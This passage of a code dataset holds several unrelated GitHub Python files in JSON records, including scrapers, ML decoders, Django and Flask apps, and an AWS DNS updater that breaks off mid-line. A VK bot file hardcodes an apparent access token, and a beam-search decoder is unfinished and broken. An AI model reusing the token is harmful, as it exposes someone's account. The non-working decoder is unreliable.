name=country['MCN'],\n url=f\"{self._main_url}{country['ML'][1:]}\",\n ))\n \n return sorted(countries, key=lambda country: country.id)\n\n def get_today_matches(self, day: Optional[int] = 0) -> List[Match]:\n today_matches_gzip = self.make_request(self._today_matches_url.replace('{day}', str(day)))\n today_matches_json = converter.gzip_to_json(today_matches_gzip.text)\n return [\n Match(id=today_match['AA'], locale=self.locale)\n for today_match in today_matches_json\n if today_match.get('AA') is not None\n ]\n\n def get_live_matches(self) -> List[Match]:\n today_matches_gzip = self.make_request(self._today_matches_url.replace('{day}', '0'))\n today_matches_json = converter.gzip_to_json(today_matches_gzip.text)\n\n return [\n Match(id=today_match['AA'], locale=self.locale)\n for today_match in today_matches_json\n if today_match.get('AA') is not None\\\n and today_match.get('AB') == '2'\n ]\n \n def get_matches_with_already_loaded_content(self, matches_ids: List[str]) -> List[Match]:\n matches = [ Match(id=id, locale=self.locale) for id in matches_ids ]\n urls = []\n for match in matches:\n urls += [\n match._flashscore_url, \n match._general_url,\n match._stats_url,\n match._events_url,\n match._odds_url,\n match._head2heads_url,\n ]\n for match, responses in zip(matches, self.split_list_to_chinks(self.make_grequest(urls), 6)):\n match.load_content(*[response.text for response in responses]) \n return matches\n","repo_name":"progeroffline/fs-football","sub_path":"flashscore/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40828287689","text":"import torch\nimport torch.nn.functional as F\n\n\ndef GreedyDecode(model, inputs, input_lengths):\n\n assert inputs.dim() == 3\n # f = [batch_size, time_step, feature_dim]\n f, _ = model.encoder(inputs, input_lengths)\n\n zero_token = torch.LongTensor([[0]])\n if inputs.is_cuda:\n zero_token = zero_token.cuda()\n results = []\n batch_size = inputs.size(0)\n\n def decode(inputs, lengths):\n log_prob = 0\n token_list = []\n gu, hidden = model.decoder(zero_token)\n for t in range(lengths):\n h = model.joint(inputs[t].view(-1), gu.view(-1))\n out = F.log_softmax(h, dim=0)\n prob, pred = torch.max(out, dim=0)\n pred = int(pred.item())\n log_prob += prob.item()\n if pred != 0:\n token_list.append(pred)\n token = torch.LongTensor([[pred]])\n if zero_token.is_cuda:\n token = token.cuda()\n gu, hidden = model.decoder(token, hidden=hidden)\n\n return token_list\n\n for i in range(batch_size):\n decoded_seq = decode(f[i], input_lengths[i])\n results.append(decoded_seq)\n\n return results\n\n\ndef BeamDecode(model, inputs, input_lengths):\n batch_size = inputs.size(0)\n\n enc_states, outputs_length = model.encoder(inputs, input_lengths)\n\n zero_token = torch.LongTensor([[0]])\n if inputs.is_cuda:\n zero_token = zero_token.cuda()\n\n def decode(enc_state, lengths, beam=10):\n hyps = [[]] * lengths\n\n dec_state, hidden = model.decoder(zero_token)\n\n for t in range(lengths):\n hyps_old = hyps[t]\n\n for j, hyp_old in enumerate(hyps_old):\n old_state = hyp_old['de_hidden']\n old_id = hyp_old['id']\n old_score = hyp_old['score']\n\n logits = model.joint(enc_state[t].view(-1), old_state.view(-1))\n out_probs = F.softmax(logits, dim=0).detach()\n\n # for k in range(beam):\n\n # hyps_best_kept = []\n # token = torch.LongTensor([[pred]])\n\n if enc_state.is_cuda:\n token = token.cuda()\n\n dec_state, hidden = model.decoder(token, hidden=hidden)\n\n new_hyp = {}\n\n # new_hyp['de_hidden'] = h_list[:]\n # new_hyp['id'] = c_list[:]\n # new_hyp['score'] = hyp['score'] + local_best_scores[0, j]\n\n # will be (2 x beam) hyps at most\n hyps_best_kept.append(new_hyp)\n\n hyps_best_kept = sorted(hyps_best_kept,\n key=lambda x: x['score'],\n reverse=True)[:beam]\n hyps[t] = hyps_best_kept\n\n # return token_list\n\n results = []\n for i in range(batch_size):\n decoded_seq = decode(enc_states[i], outputs_length[i])\n results.append(decoded_seq)\n\n return results\n\n\n\n","repo_name":"jhvmhg/rnnt","sub_path":"src/utils/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2131352046","text":"#\r\n# Copyright (c) 2022 Andrew Lehmer\r\n#\r\n# Distributed under the MIT License.\r\n#\r\n\r\nfrom __future__ import annotations\r\nfrom collections.abc import Generator\r\nfrom typing import Literal\r\n\r\nIntGenerator = Generator[int, None, None]\r\n\r\ndef bits(x: int) -> IntGenerator:\r\n \"\"\"Generates an int with one bit set for each bit set in x.\r\n \r\n >>> list(bits(42))\r\n [2, 8, 32]\r\n >>> [hex(bit) for bit in bits(0xbad)]\r\n ['0x1', '0x4', '0x8', '0x20', '0x80', '0x100', '0x200', '0x800']\r\n \"\"\"\r\n mask = 1\r\n while mask <= x:\r\n if mask & x:\r\n yield mask\r\n mask <<= 1\r\n\r\ndef bit_indices(x: int, start: Literal[0, 1] = 0) -> IntGenerator:\r\n \"\"\"Generates the bit index for each set bit in x where the index of the LSB\r\n is start.\r\n \r\n >>> list(bit_indices(42))\r\n [1, 3, 5]\r\n >>> list(bit_indices(0x69, 1))\r\n [1, 4, 6, 7]\r\n \"\"\"\r\n index = start\r\n mask = 1\r\n while mask <= x:\r\n if mask & x:\r\n yield index\r\n index += 1\r\n mask <<= 1\r\n\r\ndef ffs(x: int) -> int:\r\n \"\"\"Finds the position of the first set bit in x or -1 if no bits are set.\r\n \r\n >>> ffs(42)\r\n 1\r\n >>> ffs(0xb00)\r\n 8\r\n \"\"\"\r\n bit = 0\r\n mask = 1\r\n while mask <= x:\r\n if mask & x:\r\n return bit\r\n bit += 1\r\n mask <<= 1\r\n return -1\r\n\r\ndef fsb(x: int) -> int:\r\n \"\"\"Returns the value of the first set bit in x or 0 if no bits are set.\r\n \r\n >>> fsb(42)\r\n 2\r\n >>> fsb(0x88)\r\n 8\r\n \"\"\"\r\n mask = 1\r\n while mask <= x:\r\n if mask & x:\r\n return mask\r\n mask <<= 1\r\n return 0\r\n\r\ndef mask(length: int) -> int:\r\n \"\"\"Returns a bit mask with length LSBs set.\r\n \r\n >>> mask(5)\r\n 31\r\n \"\"\"\r\n return (1 << length) - 1\r\n\r\ndef mtz(x: int) -> int:\r\n \"\"\"Returns a mask of the trailing zero bits in x.\r\n \r\n >>> mtz(0x38)\r\n 7\r\n >>> mtz(1)\r\n 0\r\n \"\"\"\r\n return fsb(x) - 1 if x else 0\r\n\r\ndef popcount(x: int) -> int:\r\n \"\"\"Returns the number of set bits in x.\r\n \r\n >>> popcount(0b1101111010101101)\r\n 11\r\n \"\"\"\r\n return bin(x).count('1')","repo_name":"80Ltrumpet/me2-decision-tree","sub_path":"me2/bits.py","file_name":"bits.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10544870423","text":"#!/usr/bin/env python3.6\nimport requests\nimport sqlite3\nimport uuid\n\nACCESS_TOKEN = \"e4457ff3d3353f9faccbcaaca9d17d172bf926cf15c9657b336c7c46ecb65b69c3674755905e0335b6d6d\"\nBOT_ID = \"c4617d9d-f7d4-4410-a555-e23635ce2ceb\"\nGROUP_ID = \"49743066\"\n\nconn = sqlite3.connect('sessions.db')\ncur = conn.cursor()\nlongpoll = {}\n\ncur.execute('''CREATE TABLE IF NOT EXISTS sessions\n (vkid text, ssid text)''')\n\n\ndef new_longpoll():\n\treqparam = {\n\t\t'access_token': ACCESS_TOKEN,\n\t\t'v': '5.80',\n\t\t'group_id': GROUP_ID\n\t}\n\tr = requests.get('https://api.vk.com/method/groups.getLongPollServer',\n\t\t\t\t\t params=reqparam)\n\tprint(r.text)\n\tlongpoll.update(r.json().get('response', {}))\n\tprint('LongPoll was obtained')\n\n\ndef perform_answer(m):\n\tt = (m['from_id'],)\n\tsession = cur.execute('''SELECT * FROM sessions\n WHERE vkid=?''', t)\n\tsres = session.fetchone()\n\tif not sres:\n\t\tssid = uuid.uuid4()\n\t\tp = (m['from_id'], str(ssid.int))\n\t\tcur.execute('INSERT INTO sessions VALUES (?, ?)', p)\n\t\tconn.commit()\n\telse:\n\t\tssid = sres[1]\n\treqparam = {\n\t\t'q': m['text'],\n\t\t'sessionId': ssid\n\t}\n\tr = requests.get('https://console.dialogflow.com/api-client/demo/embedded/%s/demoQuery' % BOT_ID,\n\t\t\t\t\t params=reqparam)\n\tres = r.json()['result']['fulfillment']['speech']\n\treturn res\n\n\ndef send(to, text, reqMessage ):\n\treqparam = {\n\t\t'access_token': ACCESS_TOKEN,\n\t\t'v': '5.80',\n\t\t'user_id': to,\n\t\t'message': text\n\t}\n\tr = requests.get('https://api.vk.com/method/messages.send', params=reqparam)\n\tif r.status_code >= 400:\n\t\treqparam[\"message\"] = f\"Что-то пошло не так при обмене сообщениями между ВК и нашей базой ответов :(\\n\" \\\n\t\t\t\t\t\t\t f\"Ошибка: {r.reason}\"\n\t\trequests.get('https://api.vk.com/method/messages.send', params=reqparam)\n\t\topen(\"errorLog.txt\", \"w\").write(f\"{reqMessage}\\n==> {r.reason}\")\n\treturn 'response' in r.json()\n\n\ndef startListening():\n\twhile True:\n\t\treqparam = {\n\t\t\t'act': 'a_check',\n\t\t\t'key': longpoll['key'],\n\t\t\t'ts': longpoll['ts'],\n\t\t\t'wait': '25'\n\t\t}\n\t\tr = requests.get(longpoll['server'], params=reqparam)\n\t\tres = r.json()\n\t\tif 'failed' in res:\n\t\t\tif res['failed'] == 1:\n\t\t\t\tlongpoll['ts'] = res['ts']\n\t\t\t\tcontinue\n\t\t\telif res['failed'] == 2 or res['failed'] == 3:\n\t\t\t\tnew_longpoll()\n\t\t\t\tcontinue\n\t\tlongpoll['ts'] = res['ts']\n\t\tfor upd in res['updates']:\n\t\t\tif upd['type'] == 'message_new':\n\t\t\t\tmsg = upd['object']\n\t\t\t\tif msg['from_id'] == '-%s' % BOT_ID:\n\t\t\t\t\tcontinue\n\t\t\t\ttext_res = perform_answer(msg)\n\t\t\t\tprint('Request: %s' % msg[\"text\"])\n\t\t\t\tsend(msg['from_id'], text_res, msg[\"text\"])\n\t\t\t\tprint('Response: %s' % text_res)\n\t\t\t\tprint('==========')\n\n\nif __name__ == '__main__':\n\twhile True:\n\t\ttry:\n\t\t\tnew_longpoll()\n\t\t\tstartListening()\n\t\texcept Exception as e:\n\t\t\topen(\"exceptionLog.txt\", 'w').write(str(e.args))\n","repo_name":"IAlmostDeveloper/student-practice-bot","sub_path":"PyBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32852682481","text":"from datetime import timedelta, datetime\nimport dateutil\nfrom django.core.cache import cache\nfrom django.core.urlresolvers import reverse\nimport operator\nimport pytz\nfrom casexml.apps.case.models import CommCareCaseGroup\nfrom corehq.apps.groups.models import Group\nfrom corehq.apps.reports import util\nfrom corehq.apps.reports.dispatcher import ProjectReportDispatcher, CustomProjectReportDispatcher\nfrom corehq.apps.reports.exceptions import BadRequestError\nfrom corehq.apps.reports.fields import FilterUsersField\nfrom corehq.apps.reports.generic import GenericReportView\nfrom corehq.apps.reports.models import HQUserType\nfrom corehq.apps.reports.filters.select import MonthFilter, YearFilter\nfrom corehq.apps.users.models import CommCareUser\nfrom dimagi.utils.dates import DateSpan\nfrom django.utils.translation import ugettext_noop\nfrom dimagi.utils.decorators.memoized import memoized\n\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass ProjectReport(GenericReportView):\n # overriding properties from GenericReportView\n section_name = ugettext_noop(\"Project Reports\")\n base_template = 'reports/base_template.html'\n dispatcher = ProjectReportDispatcher\n asynchronous = True\n\n @property\n def default_report_url(self):\n return reverse('reports_home', args=[self.request.project])\n\n def set_announcements(self):\n if self.request.couch_user:\n util.set_report_announcements_for_user(self.request, self.request.couch_user)\n\n\nclass CustomProjectReport(ProjectReport):\n dispatcher = CustomProjectReportDispatcher\n emailable = True\n\nclass CommCareUserMemoizer(object):\n\n @memoized\n def by_domain(self, domain, is_active=True):\n users = CommCareUser.by_domain(domain, is_active=is_active)\n for user in users:\n # put users in the cache for get_by_user_id\n # so that function never has to touch the database\n self.get_by_user_id.get_cache(self)[(self, user.user_id)] = user\n return users\n\n @memoized\n def get_by_user_id(self, user_id):\n return CommCareUser.get_by_user_id(user_id)\n\nclass ProjectReportParametersMixin(object):\n \"\"\"\n All the parameters necessary for the project reports.\n Intended to be mixed in with a GenericReportView object.\n\n \"\"\"\n\n default_case_type = None\n filter_group_name = None\n filter_users_field_class = FilterUsersField\n include_inactive = False\n\n # set this to set the report's user ids from within the report\n # (i.e. based on a filter's return value).\n override_user_ids = None\n need_group_ids = False\n\n @property\n @memoized\n def CommCareUser(self):\n return CommCareUserMemoizer()\n\n @memoized\n def get_all_users_by_domain(self, group=None, user_ids=None, user_filter=None, simplified=False):\n return list(util.get_all_users_by_domain(\n domain=self.domain,\n group=group,\n user_ids=user_ids,\n user_filter=user_filter,\n simplified=simplified,\n CommCareUser=self.CommCareUser\n ))\n\n @property\n @memoized\n def user_filter(self):\n return self.filter_users_field_class.get_user_filter(self.request)[0]\n\n @property\n @memoized\n def default_user_filter(self):\n return self.filter_users_field_class.get_user_filter(None)[0]\n\n @property\n def group_id(self):\n return self.group_ids[0] if len(self.group_ids) else ''\n\n @property\n @memoized\n def group(self):\n if self.group_id and self.group_id != '_all':\n return Group.get(self.group_id)\n else:\n return self.groups[0] if len(self.groups) else None\n\n @property\n def group_ids(self):\n return filter(None, self.request.GET.getlist('group'))\n\n @property\n @memoized\n def groups(self):\n from corehq.apps.groups.models import Group\n if '_all' in self.group_ids or self.request.GET.get('all_groups', 'off') == 'on':\n return Group.get_reporting_groups(self.domain)\n return [Group.get(g) for g in self.group_ids]\n\n @property\n def individual(self):\n \"\"\"\n todo: remember this: if self.individual and self.users:\n self.name = \"%s for %s\" % (self.name, self.users[0].get('raw_username'))\n \"\"\"\n return self.request_params.get('individual', '')\n\n @property\n def mobile_worker_ids(self):\n ids = self.request.GET.getlist('select_mw')\n if '_all' in ids or self.request.GET.get('all_mws', 'off') == 'on':\n cache_str = \"mw_ids:%s\" % self.domain\n ids = cache.get(cache_str)\n if not ids:\n cc_users = CommCareUser.by_domain(self.domain)\n if self.include_inactive:\n cc_users += CommCareUser.by_domain(self.domain, is_active=False)\n ids = [ccu._id for ccu in cc_users]\n cache.set(cache_str, ids, 24*60*60)\n return ids\n\n @property\n @memoized\n def users(self):\n if self.filter_group_name and not (self.group_id or self.individual):\n group = Group.by_name(self.domain, self.filter_group_name)\n else:\n group = self.group\n\n if self.override_user_ids is not None:\n user_ids = self.override_user_ids\n else:\n user_ids = [self.individual]\n\n return self.get_all_users_by_domain(\n group=group,\n user_ids=tuple(user_ids),\n user_filter=tuple(self.user_filter),\n simplified=True\n )\n\n @property\n @memoized\n def user_ids(self):\n return [user.get('user_id') for user in self.users]\n\n _usernames = None\n @property\n @memoized\n def usernames(self):\n return dict([(user.get('user_id'), user.get('username_in_report')) for user in self.users])\n\n @property\n @memoized\n def users_by_group(self):\n user_dict = {}\n for group in self.groups:\n user_dict[\"%s|%s\" % (group.name, group._id)] = self.get_all_users_by_domain(\n group=group,\n user_filter=tuple(self.default_user_filter),\n simplified=True\n )\n if self.need_group_ids:\n for users in user_dict.values():\n for u in users:\n u[\"group_ids\"] = Group.by_user(u['user_id'], False)\n\n return user_dict\n\n @property\n @memoized\n def users_by_mobile_workers(self):\n from corehq.apps.reports.util import _report_user_dict\n user_dict = {}\n for mw in self.mobile_worker_ids:\n user_dict[mw] = _report_user_dict(CommCareUser.get_by_user_id(mw))\n\n if self.need_group_ids:\n for user in user_dict.values():\n user[\"group_ids\"] = Group.by_user(user[\"user_id\"], False)\n\n return user_dict\n\n def get_admins_and_demo_users(self, ufilters=None):\n ufilters = ufilters if ufilters is not None else ['1', '2', '3']\n users = self.get_all_users_by_domain(\n group=None,\n user_filter=tuple(HQUserType.use_filter(ufilters)),\n simplified=True\n ) if ufilters else []\n\n if self.need_group_ids:\n for u in users:\n u[\"group_ids\"] = Group.by_user(u, False)\n return users\n\n @property\n @memoized\n def admins_and_demo_users(self):\n ufilters = [uf for uf in ['1', '2', '3'] if uf in self.request.GET.getlist('ufilter')]\n users = self.get_admins_and_demo_users(ufilters)\n return users\n\n @property\n @memoized\n def admins_and_demo_user_ids(self):\n return [user.get('user_id') for user in self.admins_and_demo_users]\n\n\n @property\n @memoized\n def combined_users(self):\n #todo: replace users with this and make sure it doesn't break existing reports\n all_users = [user for sublist in self.users_by_group.values() for user in sublist]\n all_users.extend([user for user in self.users_by_mobile_workers.values()])\n all_users.extend([user for user in self.admins_and_demo_users])\n return dict([(user['user_id'], user) for user in all_users]).values()\n\n @property\n @memoized\n def combined_user_ids(self):\n return [user.get('user_id') for user in self.combined_users]\n\n @property\n @memoized\n def case_sharing_groups(self):\n return set(reduce(operator.add, [[u['group_ids'] for u in self.combined_users]]))\n\n @property\n def history(self):\n history = self.request_params.get('history', '')\n if history:\n try:\n return dateutil.parser.parse(history)\n except ValueError:\n pass\n\n @property\n def case_type(self):\n return self.default_case_type or self.request_params.get('case_type', '')\n\n @property\n def case_status(self):\n from corehq.apps.reports.fields import SelectOpenCloseField\n return self.request_params.get(SelectOpenCloseField.slug, '')\n\n @property\n def case_group_ids(self):\n return filter(None, self.request.GET.getlist('case_group'))\n\n @property\n @memoized\n def case_groups(self):\n return [CommCareCaseGroup.get(g) for g in self.case_group_ids]\n\n @property\n @memoized\n def cases_by_case_group(self):\n case_ids = []\n for group in self.case_groups:\n case_ids.extend(group.cases)\n return case_ids\n\n\n\nclass CouchCachedReportMixin(object):\n \"\"\"\n Use this mixin for caching reports as objects in couch.\n \"\"\"\n _cached_report = None\n @property\n def cached_report(self):\n if not self._cached_report:\n self._cached_report = self.fetch_cached_report()\n return self._cached_report\n\n def fetch_cached_report(self):\n \"\"\"\n Here's where you generate your cached report.\n \"\"\"\n raise NotImplementedError\n\n\nclass DatespanMixin(object):\n \"\"\"\n Use this where you'd like to include the datespan field.\n \"\"\"\n datespan_field = 'corehq.apps.reports.filters.dates.DatespanFilter'\n datespan_default_days = 7\n inclusive = True\n\n _datespan = None\n @property\n def datespan(self):\n if self._datespan is None:\n datespan = self.default_datespan\n if self.request.datespan.is_valid() and not self.request.datespan.is_default:\n datespan.enddate = self.request.datespan.enddate\n datespan.startdate = self.request.datespan.startdate\n datespan.is_default = False\n elif self.request.datespan.get_validation_reason() == \"You can't use dates earlier than the year 1900\":\n raise BadRequestError()\n self.request.datespan = datespan\n # todo: don't update self.context here. find a better place! AGH! Sorry, sorry.\n self.context.update(dict(datespan=datespan))\n self._datespan = datespan\n return self._datespan\n\n @property\n def default_datespan(self):\n datespan = DateSpan.since(self.datespan_default_days, timezone=self.timezone, inclusive=self.inclusive)\n datespan.is_default = True\n return datespan\n\n\nclass MonthYearMixin(object):\n \"\"\"\n Similar to DatespanMixin, but works with MonthField and YearField\n \"\"\"\n fields = [MonthFilter, YearFilter]\n\n _datespan = None\n @property\n def datespan(self):\n if self._datespan is None:\n datespan = DateSpan.from_month(self.month, self.year)\n self.request.datespan = datespan\n self.context.update(dict(datespan=datespan))\n self._datespan = datespan\n return self._datespan\n\n @property\n def month(self):\n if 'month' in self.request_params:\n return int(self.request_params['month'])\n else:\n return datetime.now().month\n\n @property\n def year(self):\n if 'year' in self.request_params:\n return int(self.request_params['year'])\n else:\n return datetime.now().year\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/reports/standard/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14246977544","text":"from pyspark.sql import *\nfrom pyspark.sql.functions import *\n\nspark = SparkSession.builder.master(\"local[*]\").appName(\"test\").getOrCreate()\nsc = spark.sparkContext\ndata=\"D:\\\\bigdata\\\\datasets\\\\10000Records.csv\"\ndf=spark.read.format(\"csv\").option(\"header\",\"true\").option(\"sep\",\",\").option(\"inferSchema\",\"true\").load(data)\n#inferSchema .... when ur readdding data auto convert data to appropriate datatypes means value 4444 converet to int .. 4343.4 convert to double\nimport re\nnum = int(df.count())\ncols=[re.sub('[^a-zA-Z0-9]',\"\",c.lower()) for c in df.columns]\n# re .. replace .. except all Small letters, capital letters and number except those any other symbols if u have replace/remove\n\nndf =df.toDF(*cols)\n#toDF used to rename all cloumns , and convert rdd to dataframe ... at that time use toDF\n\nndf.show(21,truncate=True)\n#by default show method showing top 20rows and if any field having more than 20 chars its truncated and shows ...\nndf.printSchema()\n#dataframe column names and its datattype dispsplay properly","repo_name":"ganu1111/pythonProject3","sub_path":"complexcsv.py","file_name":"complexcsv.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15955076349","text":"import os\nimport sys\nimport tempfile\nimport re\nfrom django.core.handlers.wsgi import WSGIHandler\n\ndef getEnvironmentFromSourceMe(thisDir):\n # pick up environment variables from sourceme\n fd, tmp = tempfile.mkstemp('djangoWsgiSourceMe.txt')\n os.close(fd)\n os.system('bash -c \"(source %s/sourceme.sh && printenv > %s)\"' % (thisDir, tmp))\n varsIn = file(tmp, 'r')\n for line in varsIn:\n line = line[:-1] # chop final cr\n var, val = line.split('=', 1)\n os.environ[var] = val\n varsIn.close()\n try:\n os.unlink(tmp)\n except:\n pass\n\n # add any new entries from PYTHONPATH to Python's sys.path\n if os.environ.has_key('PYTHONPATH'):\n envPath = re.sub(':$', '', os.environ['PYTHONPATH'])\n sys.path = envPath.split(':') + sys.path\n\ndef sendError(start_response, text):\n start_response(text, [('Content-type', 'text/html')])\n return [\"\"\"\n %s\n

    %s

    \n\n \"\"\" % (text, text)]\n\ndef downForMaintenance(environ, start_response):\n import stat\n import time\n thisDir = os.path.dirname(os.path.realpath(__file__))\n downFile = os.path.join(thisDir, 'DOWN_FOR_MAINTENANCE')\n downMtime = os.stat(downFile)[stat.ST_MTIME]\n downTimeString = time.strftime('%Y-%m-%d %H:%M %Z', time.localtime(downMtime))\n return sendError(start_response, '503 Down for maintenance since %s' % downTimeString)\n\nthisDir = os.path.dirname(os.path.realpath(__file__))\ngetEnvironmentFromSourceMe(thisDir)\nif os.path.exists(os.path.join(thisDir, 'DOWN_FOR_MAINTENANCE')):\n application = downForMaintenance\nelse:\n application = WSGIHandler()\n","repo_name":"trey0/geocamShare","sub_path":"djangoWsgi.py","file_name":"djangoWsgi.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"26374990495","text":"### the following function finds the highest perfect square which is below the input value \r\n\r\ndef HighestPerfectSQ(inputValue):\r\n\r\n### the loop iterates until the NexthighestSQ goes over the input value at which stage we take the previous highest square\r\n highestSQ=1\r\n NexthighestSQ=4\r\n index=1\r\n while NexthighestSQ<=inputValue:\r\n highestSQ=index**2\r\n index=index+1\r\n NexthighestSQ=index**2\r\n print(highestSQ)\r\n","repo_name":"NamarEXE/210CT","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30697185482","text":"from partitions.registry import registry\n\n\ndef chop(queryset, by):\n app_model = \"%s.%s\" % (\n queryset.model._meta.app_label,\n queryset.model._meta.object_name\n )\n expression = registry.expression_for(by, app_model)\n return queryset.filter(expression) if expression is not None else queryset\n","repo_name":"eldarion/django-partitions","sub_path":"partitions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"35249163218","text":"from flask import Flask, render_template, request\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nimport service\nfrom service.model import SkillSet, Skills\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n quests = service.get_quest_data()\n return render_template('index.html', quests=quests, skills=Skills)\n\n\ndef parse_initial_stats(form_data: ImmutableMultiDict[str, str]):\n result = SkillSet()\n\n for skill in result:\n type = form_data.get(f'skill{str(skill)}Type', None)\n value = form_data.get(f'skill{str(skill)}Value', '0')\n value = int(value) if value else 0\n if type == 'level':\n value = Skills.min_xp_for_level(int(value))\n result[skill] = max(result[skill], value)\n\n return result\n\n\n@app.route('/result', methods=['POST'])\ndef result():\n initial_stats = parse_initial_stats(request.form)\n completed_quests = [int(quest_id) for form_name, quest_id in request.form.items() if form_name.startswith('quest_')]\n strategy = service.get_optimal_quest_strategy(initial_quests=completed_quests, initial_stats=initial_stats)\n return render_template('result.html', strategy=strategy)\n","repo_name":"xurdones/RsOptimalQuestOrder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20077627863","text":"# import json\n# res=json.loads(response)\n# print(res['responses'][0]['textAnnotations'][1]['boundingPoly']['vertices'])\n\nimport os.path\nimport json\nimport nltk\nimport extrac_field_content\nimport conecte_to_ocr\n\n\ndef Similarity(var, fields=['Passpord Card no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth',\n 'Place of Birth']):\n min = len(var) / 3\n fieldMin = ' '\n for field in fields:\n if nltk.edit_distance(field, var) <= min or field.__contains__(var):\n min = nltk.edit_distance(field, var)\n fieldMin = field\n return fieldMin\n\n\ndef call_google_ocr_api(id_image_path):\n res = conecte_to_ocr.call_google_ocr_api(id_image_path)\n return res\n\n\ndef getSentenseplace(id_image_path):\n statment = []\n response = call_google_ocr_api(id_image_path)\n # all the fiels togezer\n ###res = json.loads\n res = response\n # print(res['responses'][0]['textAnnotations'][0]['description'])\n # statment = response[0]['textAnnotations'][0]['description'].split('\\n')\n # the array that contains all the details mevulgan\n FILENAME = r'ocrresponse.json'\n f = open(FILENAME, 'w')\n f.write(res)\n f.close()\n res = json.loads(res)\n # print(res['responses'][0]['textAnnotations'][0]['description'])\n # print(res['textAnnotations'][0]['description'])\n # print()\n statment = json.dumps(res['textAnnotations'][0]['description'])\n print(statment)\n # array that contains the fields from the picture\n statment = statment.split(\"\\\\n\")\n print()\n idfieldsplaces = {}\n idfields = {}\n # fields = ['Passpord Card no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth', 'Place of Birth']\n fields = ['Passpord no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth', 'Place of Birth']\n statment[0] = statment[0][1:]\n # !!!!!!!!!check spelling for the data that comes from ocr-esti\n # and organize the word\n sfield = res['textAnnotations']\n sfield = sfield[1:]\n\n indexOfWord = 1\n index = 0\n for s in statment:\n print(s)\n # find the positions in the json filed for every field\n for s in statment:\n cnt = s.count(' ') + 1\n # if s in fields\n currentNameField = Similarity(s.split('/')[0],fields)\n\n if (currentNameField != ' '):\n if cnt > 1:\n currentNameF = s.find(currentNameField)\n if currentNameF > 0:\n indexOfWord += currentNameF-1\n cnt -= currentNameF-1\n idfields[currentNameField] = extrac_field_content.get_filed_value(indexOfWord, res)\n idfieldsplaces[currentNameField] = indexOfWord\n indexOfWord += cnt\n index += 1\n print(\"the fields .........................................................\")\n for key, val in idfieldsplaces.items():\n print(\"{} :{}\".format(key, val), end=\"\\n\")\n print(\"the positions........................................................\")\n for key, val in idfields.items():\n print(\"{} :{}\".format(key, val), end=\"\\n\")\n idfields = json.dumps(idfields)\n print(idfields)\n\n\nif __name__ == \"__main__\":\n getSentenseplace('C:\\\\Users\\\\tichnut\\\\passport.jpg')\n\n","repo_name":"IdetectTeam/IDetect","sub_path":"post/jesonFile.py","file_name":"jesonFile.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"30980735772","text":"'''\nGran the IP addresses of all instances in an autoscaling group\nand update the route53 dns records everytime the IP changes.\n'''\n\nimport boto3\n\n# functin returns list of IP addresses of instances with specific name tag\ndef get_ec2_ip():\n\t# connect to ec2\n\tec2 = boto3.resource('ec2')\n\n\t# list to store the results\n\tec2_ip_list = []\n\tec2_info = {}\n\tnewlist = []\n\t# get all instances that are in running state\n\tinstances = ec2.instances.filter(Filters=[{\n\t 'Name': 'instance-state-name',\n\t 'Values': ['running']}])\n\n\tfor instance in instances:\n\t\tfor tag in instance.tags:\n\t\t\tif 'Name' in tag['Key']:\n\t\t\t\tname = tag['Value']\n\n\t\tif name == 'custom_name':\n\t\t\tec2_ip_list.append(instance.private_ip_address)\n\n\treturn ec2_ip_list\n\n\n# functions adds IP address to route53\ndef create_route53(hosted_zone_id, ec2_ip_autoscaling_list):\n\tdns = boto3.client('route53')\n\n\tzones = dns.get_hosted_zone(Id=hosted_zone_id)\n\t# print(zones)\n\tname = zones['HostedZone']['Name']\n\n\t# random_string = ''.join(random.choice(string.digits) for _ in range(4))\n\tresponse = dns.change_resource_record_sets(\n\t HostedZoneId=hosted_zone_id,\n\t ChangeBatch={\n\t \"Comment\": \"Automatic DNS update of EC2 instances\",\n\t \"Changes\": [\n\t {\n\t \"Action\": \"UPSERT\",\n\t \"ResourceRecordSet\": {\n\t \"Name\": 'udp.'+name,\n\t \"Type\": \"A\",\n\t # 'SetIdentifier': '9812',\n\t # 'Weight': 123,\n\t # \"Region\": \"us-east-2\",\n\t # 'MultiValueAnswer': True,\n\t \"TTL\": 300,\n\t \"ResourceRecords\": ec2_ip_autoscaling_list\n\t }\n\t }]\n\t })\n\ndef main():\n\thosted_zoneid = 'insert-zone-id'\n\tec2_ip_autoscaling_list = [] # formatted list to feed to the route53 function\n\tec2_ips = 